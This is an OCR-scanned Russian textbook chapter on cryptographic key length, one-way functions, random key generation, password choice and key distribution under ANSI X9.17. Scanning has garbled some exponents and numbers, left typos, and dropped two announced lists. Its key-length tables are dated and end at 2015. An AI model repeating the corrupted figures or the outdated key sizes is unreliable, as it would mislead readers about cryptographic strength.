Из второго закона термодинамики следует, что для записи одного бита информации путем соответствующего изменения состояния среды требуется не менее kT эрг энергии, где k— постоянная Больцмана и Т— температура системы. Учитывая, что температура Вселенной составляет 3,2° по Кельвину, для изменения одного бита информации компьютеру понадобится не менее 4,4 10 -16 эрг энергии. Уменьшение температуры среды ниже уровня температуры Вселенной потребует дополнительных затрат энергии и поэтому не имеет особого смысла.
За год вся энергия, излучаемая Солнцем, составляет 1,21 10- 41 эрг. Ее хватит, чтобы произвести 2,7 1056 записей одного бита информации, что эквивалентно прогону 187-битного счетчика через все возможные состояния. Если наше довольно "прохладное" Солнце заменить сверхновой звездой, то счет-£ чик можно сделать 219-битным.
Сказанное означает, что атака методом тотального перебора против криптосистемы с 256-битным ключом энергетически неосуществима до тех пор, пока компьютеры являются объектами материального мира и их функционирование подчиняется его законам, в частности — второму закону термодинамики.
Однонаправленные функции
Понятие однонаправленной функции является основным в криптографии с открытым ключом. К однонаправленным относят такие функции, которые достаточно легко вычислить, но значительно труднее обратить. То есть, при наличии х нетрудно определить f(x), однако, при условии знания только f(x) на нахождение соответствующего значения х уйдут миллионы лет вычислений на всех компьютерах, которые только есть в мире.
Аналогом однонаправленной функции в быту является разбитая вдребезги стеклянная бутылка. Расколотить ее на мелкие осколки очень легко, однако попробуйте снова собрать целую бутылку из осколков!
Строгое математическое доказательство существования однонаправленных функций, а также правила их построения пока не придуманы. Тем не менее. существует множество функций, которые все считают однонаправленными: их значения довольно эффективно вычисляются, однако обратить эти функции каким-либо простым методом не удается. Хорошим примером может служить вычисление функции х 2 в конечных полях.
Какой прок от однонаправленных функций в криптографии? Ведь если с ее помощью зашифровать сообщение, прочесть его не сможет никто. Вернемся к аналогии с бутылкой. Напишите на ней открытый текст, разбейте ее вдребезги и дайте осколки своему приятелю, чтобы он прочитал написанный вами текст. И не забудьте упомянуть про однонаправленные функции, чтобы произвести на него должное впечатление вашими глубокими познаниями в криптографии! К сожалению, дальнейший путь этих осколков лежит только в мусорное ведро, ибо в таком виде ваше послание не примет ни одно почтовое отделение.
Поэтому в криптографии большим спросом пользуются однонаправленные функции с лазейкой, которые представляют собой особую разновидность однонаправленных функций. Однонаправленную функцию с лазейкой по-прежнему трудно обратить, но только не зная секрета вычисления обратной к ней функции. То есть, при данном х легко найти f(x) и наоборот — трудно отыскать х, зная одно лишь значение f(x). Однако существует такая секретная информация (у), что если известны у и f(x), то вычислить х будет значительно проще.
Хорошим аналогом однонаправленной функции с лазейкой служат обыкновенные часы. Их очень легко разобрать на большое количество мельчайших деталей, из которых потом будет весьма трудно снова собрать работающий часовой механизм. Однако при наличии инструкции по сборке часов сделать это не так и сложно.
Особый интерес для криптографов представляют однонаправленные хэш-функции. Алгоритмы хэширования, реализуемые с помощью хэш-функций, позволяют преобразовывать строки переменной длины, называемые образами, в строки фиксированной длины, которые принято именовать хэш-значениями. Обычно хэш-значение гораздо меньше любого из образов. Примером простейшей хэш-функции является преобразование байтовой строки в хэш-значение, равное одному байту, который получается сложением всех байтов этой строки по модулю 2. Однако такая кэш-функция не является однонаправленной: нетрудно подобрать строку символов, суммирование которых по модулю 2 даст заранее заданное значение.
Однонаправленная хэш-функция позволяет легко сгенерировать, хэш-значение. Однако, зная только его, будет очень трудно подобрать соответствующий ему образ. Качественная однонаправленная хэш-функция чаше всего является непротиворечивой: весьма сложно получить два различных образа, для которых хэш-значение будет одним и тем же.
Процесс хэширования в криптографии — не тайна. Однонаправленная хэш- функция обеспечивает необходимый уровень зашиты благодаря своей однонаправленности. По выходу такой хэш-функции невозможно сказать, что было подано на ее вход, а изменение даже одного бита образа приводит к смене в среднем половины бит соответствующего хэш-значения.
Длина открытого ключа
Многие современные алгоритмы шифрования с открытым ключом основаны на однонаправленности функции разложения на множители числа, являющегося произведением двух больших простых чисел. Эти алгоритмы также могут быть подвергнуты атаке, подобной методу тотального перебора. применяемому против шифров с секретным ключом, с одним лишь отличием: опробовать каждый ключ не потребуется, достаточно суметь разложить на множители большое число.
Конечно, разложение большого числа на множители — задача трудная. Однако сразу возникает резонный вопрос, насколько трудная. К несчастью для криптографов, сложность ее решения уменьшается. И что еще хуже, эта сложность падает значительно более быстрыми темпами, чем ожидалось ранее. Например, в середине 70-х годов считалось, что для разложения на множители числа из 125 цифр потребуются десятки квадрильонов лет. А всего два десятилетия спустя с помощью компьютеров, подключенных к сети Internet удалось разложить на множители число из 129 цифр. Этот прорыв стал возможен благодаря тому, что за прошедшие 20 лет были не только предложены новые, более быстрые, методы разложения на множители больших чисел, но и возросла производительность используемых компьютеров.
Поэтому квалифицированный криптограф должен проявлять очень большую осторожность и осмотрительность, когда речь заходит о длине открытою ключа. Необходимо учитывать, насколько ценна засекречиваемая с его помощью информация и как долго она должна оставаться в тайне для посторонних.
А почему, спрашивается, не взять 10000-битный ключ 9 Ведь тогда отпадут все вопросы, связанные со стойкостью асимметричного алгоритма шифрования с открытым ключом, основанном на разложении большого числа па множители. Но дело в том, что обеспечение достаточной стойкости шифра не является единственной заботой криптографа. Имеются дополнительные соображения, влияющие на выбор длины ключа, и среди них — вопросы. связанные с практической реализуемостью алгоритма шифрования при выбранной длине ключа.
Чтобы оценить длину открытого ключа, будем измерять доступную криптоаналитику вычислительную мощь в так называемых мопс-годах, т. е. количеством операций, которые компьютер, способный работать со скоростью 1 миллион операций в секунду, выполняет за год. Допустим, что хакер имеет доступ к компьютерным ресурсам общей вычислительной мощью 10000 мопс-лет, крупная корпорация — 107 мопс-лет, правительство — 109 мопс-лет. Это вполне реальные цифры, если учесть, что при реализации упомянутого выше проекта разложения числа из 129 цифр его участники задействовали всего 0,03% вычислительной мощи Internet, и чтобы добиться этого, им не потребовалось принимать какие-либо экстраординарные меры или выходить за рамки закона.
Предположим еще, что вычислительная мощь возрастает в 10 раз каждые 5 лет, а метод, который используется для разложения больших чисел на множители, позволяет это делать с трудоемкостью, указанной в табл. 6.3.
Таблица 6.3. Трудоемкость разложения больших чисел на множители
Количество бит в двоичном представлении числа | Количество мопс-лет для разложения на множители |
768 | 3-10 5 |
1024 | 3-10 7 |
1280 | 3-10 9 |
1536 | 3-10 11 |
2048 | 3-10 14 |
Сделанные предположения позволяют оценить длину стойкого открытого ключа в зависимости от срока, в течение которого необходимо хранить зашифрованные с его помощью данные в секрете (табл. 6.4). При этом необходимо помнить, что криптографические алгоритмы с открытым ключом часто применяются для защиты очень ценной информации на весьма долгий период времени. Например, в системах электронных платежей или при нотариальном заверении электронной подписи. Идея потратить несколько месяцев на разложение большого числа на множители может показаться кому-то очень привлекательной, если в результате он получит возможность рассчитываться за свои покупки по вашей кредитной карточке. Кроме того, я думаю, что вам совсем не улыбается перспектива быть вызванным через 20 лет на заседание суда, на котором рассматривается дело о наследстве, отстаивать невозможность подделать электронную подпись вашего дедушки. использованную им для составления завещания в вашу пользу.
Таблица 6.4. Рекомендуемая длина открытого ключа (в битах)
Год | Хакер | Крупная корпорация | Правительство |
2000 | 1024 | 1280 | 1536 |
2005 | 1280 | 1536 | 2048 |
2010 | 1280 | 1536 | 2048 |
2015 | 1536 | 2048 | 2048 |
С приведенными в табл. 6.4 данными согласны далеко не все авторитетные криптографы. Некоторые из них наотрез отказываются делать какие-либо долгосрочные прогнозы, считая это бесполезным делом. Другие, например, специалисты из АНБ, чересчур оптимистичны, рекомендуя для систем цифровой подписи длину открытого ключа всего 512—1024 бита, что в свете данных из табл. 6.4 является совершенно недостаточным для обеспечения надлежащей долговременной защиты.
Какой длины должен быть ключ
Криптоаналитическая атака против алгоритма шифрования обычно своим острием бывает направлена в самое уязвимое место этого алгоритма. Например, для организации шифрованной связи часто используются криптографические алгоритмы как с секретным, так и с открытым ключом. Такая криптосистема называется гибридной. Стойкость каждого из алгоритмов, входящих в состав гибридной криптосистемы, должна быть достаточной, чтобы успешно противостоять вскрытию. Например, глупо применять симметричный алгоритм с ключом длиной 128 бит совместно с асимметричным алгоритмом, в котором длина ключа составляет всего 386 бит. И наоборот, не имеет смысла задействовать симметричный алгоритм с ключом длиной 56 бит вместе с асимметричным алгоритмом с ключом /шиной 1024 бита.
В табл. 6.5 перечисляются пары длин ключей для симметричного и асимметричного криптографического алгоритма, при которых стойкость обоих алгоритмов против криптоаналитической атаки методом тотального перебора приблизительно одинакова. Из данных, приведенных в табл. 6.5, например, следует, что если используется симметричный алгоритм со 112-битным ключом, то вместе с ним должен применяться асимметричный алгоритм с 1792-битным ключом. Однако на практике ключ для асимметричного алгоритма шифрования обычно выбирают несколько более стойким, чем для симметричного, поскольку с помощью первого защищаются значительно большие объемы информации и на более продолжительный срок.
Таблица 6.5. Длины ключей для симметричного и асимметричного алгоритмов шифрования с одинаковой стойкостью против криптоаналитической атаки методом тотального перебора
Длина ключа для симметричного алгоритма
Длина ключа для асимметричного алгоритма
56
384
64
512
80
768
112
1792
128
2304
Работа с ключами
Предположим, некто Иванов и Петров пользуются надежной системой связи. Они делятся друг с другом своими соображениями на разные темы, играют в покер по переписке, заключают взаимовыгодные контракты, заверяя их своими цифровыми подписями, а затем производят расчеты между собой посредством электронных платежей. Алгоритм шифрования, используемый ими для этих целей, обладает сверхвысокой стойкостью. Но к сожалению, они покупают криптографические ключи в фирме "Ключкис и К о ", девиз которой гласит: "Полностью доверьтесь нам. Надежность — девичья фамилия бывшей тещи нашего генерального директора".
Давиду Ключкису вместе с его компанией не надо напрягаться и вскрывать алгоритм шифрования, применяемый Ивановым и Петровым. С помощью дубликатов проданных им ключей он может читать абсолютно всю их конфиденциальную переписку, подделывать их цифровые подписи и снимать деньги с их электронных счетов.
Работа с ключами является самым уязвимым местом в любой криптосистеме. Создать стойкий алгоритм шифрования тоже нелегко, однако в этом деле можно положиться на результаты многочисленных научных исследований, проводимых учеными-криптографами. Сохранить ключ в секрете от посторонних значительно сложнее.
А значит, нет необходимости потеть над вскрытием криптографического алгоритма. Проще добыть ключ, с которым не очень бережно обращается его владелец. Да и в человеке гораздо легче отыскать изъяны, чем в шифре.
Потратить 10 млн долл. на разработку и изготовление специализированного криптоаналитического суперкомпьютера? Ну уж нет! Лучше за 1000 долл. подкупить шифровальщика, который будет регулярно передавать ключи к шифру. А если бюджет позволяет, то за миллион долларов можно накупим, этих ключей на много-много лет вперед. Американский военнослужащий Джон Уокер, к примеру, годами снабжал советскую разведку ключами к шифрам ВМС США, что позволило КГБ прочесть огромное количество американских шифровок. Ну а за несколько миллионов долларов доставим, где-то ключи, чтобы потом с их помощью читать шифрованные сообщения, нет нужды и вовсе. За такие огромные деньги лучше сразу приобрести oi-крытые тексты этих сообщений. Например, всего 2 млн долларов понадобилось советской разведке, чтобы купить высокопоставленного сотрудника американской контрразведки Олдрича Эймса вместе с женой.
Ну а если из бюджета не удается выкроить нужную сумму на подкуй, то можно воспользоваться другими методами. Человек слаб: его можно напоить, усыпить или просто оглушить тяжелым предметом, чтобы выкраси, криптографические ключи. Его можно также соблазнить. Морские пехотинцы, охранявшие американское посольство в Москве, по просьбе своих русских любовниц пропускали в шифровальный отсек посольства сотрудников КГБ — на "экскурсию".
Это значит, что криптографические ключи нуждаются в такой же защите. как и сами данные, которые шифруются с их помощью. К сожалению, во многих коммерческих средствах шифрования часто считается достаточным провозгласить об использовании DES-алгоритма или другого достаточно стойкого шифра, а о генерации и хранении ключей к ним не говорить ни слова. Например, программа DiskLock (версия 2.1) для персонального компьютера Macintosh позволяет шифровать файлы по DES-алгоритму. Однако ключ, использованный этой программой для зашифрования, она сохраняет на носителе информации вместе с файлом. Зная, где лежит ключ, его можно оттуда извлечь и затем без особых хлопот прочесть с помощью этого ключа содержимое зашифрованного файла. В данном случае совершенно неважно. что сам алгоритм шифрования достаточно надежен. Имеет значение только то, что его реализация абсолютно никуда не годится.
Зачем вообще нужно рассматривать вопрос о генераторах случайных и псевдослучайных последовательностей в криптографии? Ведь в руководстве но каждому компилятору описана функция, позволяющая генерировать случайные числа. Наверное, лучше не городить огород, а воспользоваться тем. что уже имеется?
Нет, не лучше. К сожалению, датчики "случайных" чисел, встроенные в компиляторы, не подходят для криптографических приложений, поскольку генерируемые ими числа недостаточно случайны. Надеяться породить нечто совершенно случайное на компьютере, который по своей природе является строго детерминированным устройством, по меньшей мере, безосновательно.
Псевдослучайные последовательности
Самое лучшее, на что способен компьютер, — это сгенерировать псевдослучайную последовательность, которая хотя и выглядит случайной, но, на самом деле, таковой не является. Период псевдослучайной последовательности должен быть достаточно большим, чтобы ее подпоследовательность требуемой длины была апериодичной, т. е. имела период, совпадающий с ее длиной. Например, если нужна строка из миллиона случайных бит, то для ее порождения не стоит использовать генератор последовательностей, которые повторяются через каждые 65536 бит.
Псевдослучайная битовая последовательность должна, по возможности, не отличаться от по-настоящему случайной. Необходимо, чтобы в ней число единиц примерно совпадало с числом нулей, а половина всех "полосок" (подряд идущих идентичных компонентов последовательности) имела длину I. одна четвертая — длину 2, одна восьмая — длину 4 и т. д. Кроме только что перечисленных, существует еще ряд общепринятых тестов, которые позволяют проверить, действительно ли данная последовательность является псевдослучайной.
Созданию хороших генераторов псевдослучайных последовательностей уделяется достаточно большое внимание в математике. В настоящее время удается порождать последовательности с периодом порядка 2000—3000 бит. Проблема в том, что все генераторы псевдослучайных последовательностей при определенных условиях дают предсказуемые результаты и корреляционные зависимости. А это как раз то, чего ждут от псевдослучайных последовательностей криптоаналитики, чтобы предпринять эффективную атаку на криптосистемы, где эти последовательности используются.
Криптографически надежные псевдослучайные последовательности
В криптографии к псевдослучайным последовательностям предъявляется гораздо большие требования, чем простое наличие у них определенных признаков статистической случайности. Чтобы псевдослучайная последовательность была криптографически надежной, необходимо, чтобы она была непредсказуемой. Это значит, что для криптографически надежной псевдослучайной битовой последовательности невозможно заранее сказать, каким будет ее следующий бит, даже зная алгоритм генерации этой последовательности и все ее предыдущие .биты. Как и любой криптографический алгоритм, генератор криптографически надежной псевдослучайной последовательности может быть атакован и вскрыт криптоаналитпком. Криптография учит, как сделать такие генераторы стойкими к криптоаналитическим атакам различных типов.
По-настоящему случайные последовательности
Последовательность называется no-настоящему случайной, если ее нельзя воспроизвести. Это означает, что если запустить генератор по-настоящему случайных последовательностей дважды при одном и том же входе, то на его выходе получатся разные случайные последовательности. Основная трудность состоит в том, чтобы суметь отличить случайную последовательность от неслучайной. Если несколько раз зашифровать строку символов с помощью криптографического алгоритма, соответствующего ГОСТ 28147-89, то получится последовательность, очень напоминающая по-настоящему случайную. Чтобы доказать ее неслучайность, другого способа, кроме аренды АНБ соответствующих вычислительных мощностей и программы вскрытия. не существует. Однако вряд ли ваше предложение об аренде будет воспринято там всерьез.
Стойкость шифра должна определяться только секретностью ключа. Если для генерации ключей используется нестойкий алгоритм, криптосистема будет нестойкой. Вскрытию подвергнется не сам шифр, а алгоритм генерации ключей.
Сокращенные ключевые пространства
Длина ключа в DES-алгоритме составляет 56 бит. В принципе, в качестве ключа может быть использован любой 56-битный вектор. На практике это правило часто не соблюдается. Например, широко распространенная программа шифрования файлов Norton Discreet, входящая в пакет Norton Utilities (версии 8.0 или более младшей версии), который предназначен для работы в операционной системе DOS, предлагает пользователю программную реализацию DES-алгоритма. Однако при вводе ключа разрешается подавать на вход программы только те символы, старший бит представления которых в коде ASCII равен нулю. Более того, пятый бит в каждом байте введенного ключа является отрицанием шестого бита, и в нем игнорируется младший бит. Это означает, что мощность ключевого пространства сокращается до каких-то жалких 2 40 ключей. Таким образом из-за плохой процедуры генерации ключей программа Norton Discreet реализует алгоритм шифрования, ослабленный в десятки тысяч раз по сравнению с настоящим DES-алгоритмом.
В табл. 6.6 приведено количество возможных ключей в зависимости от раз-личных ограничений на символы, которые могут входить в ключевую последовательность. Табл. 6.7 содержит сложность атаки методом тотального перебора при условии, что перебор ведется со скоростью 1 млн ключей в секунду.
Таблица 6.6. Количество возможных ключей в зависимости от ограничений на символы ключевой последовательности
Символы ключа | 4 байта | 5 байт | 6 байт | 7 байт | 8 байт |
Строчные буквы (26) | 4,7*10 5 | 1,3*10 7 | 3,2*10 8 | 8,1*10 9 | 2,2*10 11 |
Строчные буквы и цифры (36) | 1,8*10 6 | 6,1*10 7 | 2.3*10 9 | 7,9*10 10 | 2.9*10 12 |
Буквы и цифры (62) | 1,6*10 7 | 9,3*10 8 | 5,8*10 10 | 3,6*10 11 | 2,3*10 14 |
Печатаемые символы (95) | 8,2*10 7 | 7,8*10 9 | 7,5*10 11 | 7,1*10 13 | 6,7*10 15 |
Все ASCII-символы | 4,4*10 9 | 1,2*10 10 | 2,9*10 14 | 7,3*10 16 | 1,9*10 19 |
Таблица 6.7. Сложность атаки методом тотального перебора при условии, что перебор ведется со скоростью 1 миллион ключей в секунду
Символы ключа | 4 байта | 5 байт | 6 байт | 7 байт | 8 байт |
Строчные буквы (26) | 0,6 сек. | 13 сек. | 6 мин. | 2,3ч. | 2,5 дн. |
Строчные буквы и цифры (36) | 1,8 сек. | 2 мин. | 37 мин. | 23ч. | 34 дн. |
Буквы и цифры (62) | 16 сек. | 16 мин. | 17ч. | 42 дн. | 7,0 лет |
Печатаемые символы (95) | 1,5 мин. | 2,2ч. | 8,6 дн. | 2,3 лет | 211 лет |
Все ASCII-символы | 1,3ч. | 14 дн. | 9,0 лет | 2400 лет | 590000 лет |
Из табл. 6.6 следует, что возможность опробовать 1 млн ключей в секунду позволяет в разумные сроки вскрывать 8-байтовые ключи из строчных букв и цифр, 7-байтовые буквенно-цифровые ключи, 6-байтовые ключи, составленные из печатаемых ASCII-символов, и 5-байтовые ключи, в которые могут входить любые ASCII-символы. А если учесть, что вычислительная мощь компьютеров увеличивается вдвое каждые полтора года, то для успешного отражения атаки методом тотального перебора в течение ближайшего десятилетия необходимо заблаговременно позаботиться о том. чтобы используемый ключ был достаточно длинным.
Плохие ключи
Когда отправитель сам выбирает ключ, с помощью которого он шифрует свои сообщения, его выбор обычно оставляет желать лучшего. Например, Петр Сергеевич Иванов скорее предпочтет использовать в качестве ключа Ivanov, чем &7)g\*. И вовсе не потому, что он принципиально не желает соблюдать элементарные правила безопасности. Просто свою фамилию Иванов помнит гораздо лучше, чем абракадабру из шести произвольно взятых символов. Однако тогда сохранить свою переписку в тайне ему не поможет и самый стон кий алгоритм шифрования в мире, особенно если используемые Ивановым ключи всегда совпадают с именами его ближайших родственников и записывает он эти ключи на клочках бумаги, которые наклеивает на компьютер. В ходе хорошо организованной атаки методом тотального перебора квалифицированный криптоанатитик не будет опробовать все ключи последовательно, один за другим. Он сначала проверит те из них, которые хоть что-то значат для Иванова. Такая разновидность атаки методом тотального перебора наливается товарной атакой, поскольку в ходе нее противник использует словарь наиболее вероятных ключей. В этот словарь обычно входят:
Случайные ключи
Хороший ключ представляет собой случайный битовый вектор. К примеру. если его длина составляет 56 бит, то это значит, что в процессе его генерации с одинаковой вероятностью может получиться любой из 2 56 возможных ключей. Источником случайных ключей обычно служит либо природный случайный генератор (хорошей аналогией такого генератора является маленький ребенок, который только что научился ходить, — временные интервалы между его падениями абсолютно случайны). Кроме того, источником случайного ключа может быть криптографически надежный генератор псевдослучайных битовых последовательностей. Лучше, чтобы процесс генерации ключей был автоматизирован. Если под рукой нет компьютера для запуска программы, реализующей псевдослучайный генератор, или ваш ребенок давно уже вышел из младенческого возраста, можно бросать монетку или игральную кость.
Использование хорошего генератора случайных чисел является очень важным моментом при генерации криптографических ключей, однако не следует слишком много спорить о том, какой из этих генераторов является более случайным. Важнее применять стойкие алгоритмы шифрования и надежные процедуры работы с ключами. Если у вас появились сомнения относительно случайности при выборе ключа, можно использовать один из методов генерации ключей, описанных ниже в этой главе.
Во всех алгоритмах шифрования имеются так называемые нестойкие ключи. Это означает, что некоторые из ключей к шифру являются менее надежными, чем остальные. Поэтому при генерации ключей нужно автоматически проверять их на стойкость и генерировать новые вместо тех, которые эту проверку не прошли. К примеру, в DES-алгоритме имеются всего 24 нестойких ключа из общего количества 2 56 , и следовательно вероятность наткнуться на нестойкий ключ пренебрежимо мала. Кроме того, откуда криптоаналитику знать, что для зашифрования конкретного сообщения или файла был применен именно нестойкий ключ? А сознательный отказ от использования нестойких ключей дает противнику дополнительную информацию о вашей криптосистеме, что нежелательно. С другой стороны, проверка ключей на нестойкость достаточно проста, чтобы ею пренебрегать.
Генерация открытых ключей гораздо более затруднена, чем генерация секретных ключей, поскольку открытые ключи должны обладать определенными математическими свойствами (например, должны быть результатом произведения двух простых чисел).
Пользоваться случайными ключами не всегда удобно. Иногда ключ требуется сохранить в памяти, а запомнить 36f9 67аЗ f9cb d931 человеку не так-то просто. В этом случае для генерации можно использовать некое правило, которое будет очевидно для вас, но недоступно для постороннего. Два варианта такого правила:
Пароль
Более привлекателен подход, при котором вместо отдельного слова используется достаточно длинное легко запоминающееся предложение на русском, английском или другом языке, которое преобразуется в ключ. Такое выражение в криптографии называется паролем. Для преобразования пароля в псевдослучайный битовый ключ можно воспользоваться любой однонаправленной хэш-функцией.
Пароль следует выбирать достаточно длинным, чтобы полученный в результате его преобразования ключ был случайным. Из теории информации известно, что в предложении на английском языке каждая буква содержит примерно 1,3 бита информации. Тогда, чтобы получить 64-бтный ключ, пароль должен состоять примерно из 49 букв, что соответствует английской фразе из 10 слов.
Необходимо, чтобы при желании пароль было легко вспомнить, и в то же время требуется, чтобы он был достаточно уникален. Цитата из Козьмы Пруткова, которая у всех на слуху, вряд ли подойдет, поскольку его сочинения имеются в форме, доступной для воспроизведения на компьютере, и следовательно, могут быть использованы в словарной атаке. Лучше воспользоваться творчеством малоизвестного поэта или драматурга, процитировав его с ошибками. Большего эффекта можно добиться, если в цитате, использованной для генерации ключа, будут присутствовать иностранные слова. Идеально подходят для этой цели незатейливые ругательства — их вам не придется записывать, чтобы запомнить. Достаточно шарахнуть себя по пальцу молотком, и пароль автоматически придет вам в голову. Надо только сдержаться и не произнести его вслух, чтобы не подслушали посторонние.
Несмотря на все сказанное, залогом наилучшей зашиты служит не шаманство при выборе пароля, а случайность полученного ключа. Хороший ключ — это случайный ключ, а значит, заранее будьте готовы к тому, что запомнить его наизусть будет очень трудно.
Стандарт ANSI X9.17
Американский национальный институт стандартов (ANSI) разработал метол генерации 64-битных ключей при помощи DES-алгоритма. Его основное назначение состоит в получении большого количества ключей для многократных сеансов связи. Вместо DES-алгоритма можно использовать любой другой стойкий алгоритм шифрования.
Пусть функция Е K (Р) осуществляет шифрование Р по DES-алгоритму на заранее заготовленном ключе К, который используется только для генерации секретных ключей. Пусть далее V 0 является начальным 64-битным значением, которое держится в тайне от противника, а Т i представляет собой отметку времени, когда был сгенерирован i-й ключ. Тогда очередной случайный ключ R i вычисляется с помощью преобразования:
R i = Е К (Е К (Т i ) Å V i )
Чтобы получить очередное значение V i , надо вычислить
V i = Е К (Е К (Т i ) Å R i )
Одна из проблем, которую приходится решать военным криптографам, состоит в том, чтобы в случае захвата противником разработанного ими стойкого криптографического оборудования максимально затруднить его использование для защиты вражеских коммуникаций. Первым шагом на пути к решению этой проблемы является аппаратная реализация алгоритма шифрования в виде модуля, который противник не сможет вскрыть с целью ознакомления с особенностями алгоритма.
Затем нужно позаботиться о том, чтобы используемые ключи имели специальный вид. Если введенный ключ имеет отклонения от этого вида, то для шифрования сообщений будет применяться значительно менее стойкий криптографический алгоритм. Желательно, чтобы шансы случайно придать ключу специальный вид, необходимый для шифрования по стойкому алгоритму, были пренебрежимо малы.
Ключевое пространство такого алгоритма шифрования называется нелинейным, поскольку ключи не являются в равной степени стойкими. Если же все ключи шифра обладают одинаковой стойкостью, то его ключевое пространство называют линейным или однородным. Один из способов добиться нелинейности ключевого пространства состоит в разделении используемого ключа на две части: собственно ключа шифрования и некоторой фиксированной строки открытого текста, зашифрованной с помощью этого ключа После расшифрования строки криптомодуль сравнивает полученный открытый текст с эталонным и при совпадении работает но стойкому алгоритму шифрования, а при несовпадении использует значительно менее нестойкий.
Например, блочный алгоритм шифрования с длиной блока 64 бита и длиной ключа 128 бит может использовать "составной" ключ из 192 бит. Тогда вероятность случайно использовать стойкий ключ будет достаточно мала — всего 2 -64 .
Однако применить данный подход можно только при условии, что противник не в состоянии восстановить реализованный алгоритм шифрования методом обратного проектирования. Необходимо также добиться, чтобы разница в стойкости ключей не слишком бы бросалась противнику в глаза, и он ни о чем бы не догадался.
Предположим, что Иванов и Петров обмениваются сообщениями, которые они защищают с использованием симметричного криптографического алгоритма. Для того чтобы зашифровать и потом расшифровать эти сообщения. они должны пользоваться одними и теми же ключами. Петров генерирует ключи при помощи хорошего генератора псевдослучайных битовых последовательностей. Вопрос в том, как Петров передает сгенерированные ключи Иванову. Например, они могут встретиться в каком-нибудь безлюдном месте (в кабинке вокзального туалета или на одном из спутников Сатурна), однако нет необходимости доказывать, что это не всегда удобно как для Петрова, так и для Иванова.
Посылать ключи Иванову, пользуясь тем же каналом связи, по которому они обмениваются шифрованными сообщениями, Петров тоже вряд ли захочет. Ведь если канал связи настолько ненадежен, что требует шифрования посылаемых сообщений, то отправка по нему ключа приведет к тому, что кто-нибудь перехватит этот ключ и сможет прочесть с его помощью пес шифрованные сообщения Иванова и Петрова.
Упоминавшийся выше американский стандарт ANSI X9.17 определяет две разновидности ключей. Ключи шифрования данных используются для зашифрования сообщений, отправляемых по каналам связи. Ключи шифрования ключей применяются для зашифрования других ключей, которые предназначены для передачи получателям этих шифрованных сообщении. Ключи шифрования ключей передаются по каналам связи, исключающим подслушивание. Например, с помощью курьеров. Однако, поскольку делать это приходится значительно реже, чем посылать ключи шифрования данных, такой способ передачи ключей абонентам сети связи вполне пригоден для использования на практике.
Другой способ распределения ключей состоит в разбиении ключа на части и в передаче этих частей ключа по различным каналам связи. Одну часть можно отправить телеграфом, другую — доверить телефону, третью — послать с почтовым голубем и т. д. Даже если противнику удастся завладеть всеми частями ключа, кроме одной, без подсказки он все равно не сумеем сообразить, что именно попало ему в руки.
Итак, Петров передает сгенерированные ключи Иванову либо при личной встрече с глазу на глаз, либо делит ключи на части, которые передает по различным каналам. Петров также может отсылать ключи Иванову, пользуясь тем же каналом, по которому он отправляет шифрованные сообщения, однако перед отсылкой ключей Петров должен зашифровать их с помощью ключа шифрования ключей. Поскольку количество передаваемых ключей не очень велико, ключ шифрования ключей часто менять не потребуется. Однако компрометация этого ключа даст противнику возможность прочесть всю шифрованную переписку, которая велась с его помощью, а посему оберегать ключ шифрования ключей следует с особенной тщательностью.
С ростом количества абонентов сети связи применять подход, рекомендуемый стандартом ANSI X9.17, становится все трудней и трудней. Если n человек захотят обмениваться шифрованными сообщениями, общее число переданных ими ключей составит п(п-1)/2. При n =1000 потребуется почти 500 тыс. пересылок ключей между абонентами, что может вылиться в серьезную проблему. В этом случае лучше производить рассылку ключей из единого центра (назовем его центром распределения ключей, сокращенно — ЦРК).
Как Иванову убедиться в том, что полученные им ключи были действительно переданы Петровым, а не противником, который притворился Петровым? Если Петров отдает ключи Иванову с глазу на глаз, то сделать это довольно легко. Однако если Петров присылает ключи с курьером, то Иванову придется положиться на честность курьера. А если полученные Ивановым ключи зашифрованы с помощью ключа шифрования ключей, ему остается лишь надеяться, что этот ключ имеется только у Петрова. Наконец, если рассылку ключей производит ЦРК, Иванов должен убедиться в надежности процедур рассылки, которые приняты в ЦРК.
Если противник полностью контролирует все каналы связи, которыми пользуется Иванов, он может заставить поверить Иванова во что угодно. Противник может прислать ему фальшивый ключ шифрования ключей якобы от Петрова и затем передавать Иванову поддельные ключи шифрования данных, зашифрованные на этом ключе. Противник будет в состоянии обзавестись собственным ЦРК и слать Иванову ключи от имени подлинного ЦРК. И ничего не подозревающий Иванов станет шифровать свои сообщения с помощью ключей, известных противнику.
Подобные рассуждения иногда приводятся, чтобы доказать ненужность криптографических методов, применяемых при передаче ключей Ведь получается, что у Иванова и Петрова нет иного пути удостовериться в подлинности используемых ими ключей на все 100%, кроме личной встречи.
Эти рассуждения наивны. На практике установить тотальный контроль нал чьими бы то ни было линиями связи невозможно. Действительно. Иванов не в силах убедиться наверняка, что переданный ему ключ не был подменен всемогущим противником. Однако, чтобы его контроль был действительно тотальным, такому противнику придется прибегнуть к средствам, которые в реальном мире ему вряд ли будут доступны.
Зная голос Петрова, Иванов может проверить подлинность полученною ключа по телефону. Если это открытый ключ, то его можно просто продиктовать. Если это секретный ключ, то его можно подвергнуть преобразованию с помощью однонаправленной хэш-функции и передать по телефону полученное значение для сравнения с аналогичным значением, подсчитанным на другом конце провода.
Нередко бывает, что Иванов желает убедиться: переданный ему ключ не только является подлинным, но и не был искажен при передаче. Ведь в результате Иванов может оказаться не в состоянии прочесть многие мегабайты шифр-текста. Если соответствующий открытый текст был ASCII-файлом, то можно проверить ключ, попытавшись расшифровать с его помощью шифртекст, и получив абракадабру вместо осмысленного текста, сделать вывод о том, что ключ был передан с искажениями. Если открытый текст является достаточно случайным, можно прибегнуть к другим методам проверки ключа.
Один из них состоит в добавлении к передаваемому ключу так называемого верификационного блока — специального заголовка длиной несколько байт, который известен и отправителю, и получателю. Петров посылает его Иванову в шифрованном виде вместе с ключом. С помощью этого ключа Иванов расшифровывает верификационный блок и убеждается, что полученный открытый текст совпадает с известным ему эталоном. В качестве верификационного блока можно использовать контрольную сумму, вычисленную для данного ключа. В этом случае Иванову нет необходимости знать верификационный блок заранее, до прихода ключа. Имея ключ, Иванов вычислит для него контрольную сумму, а затем сравнит ее со значением, которое он получит, расшифровав верификационный блок.
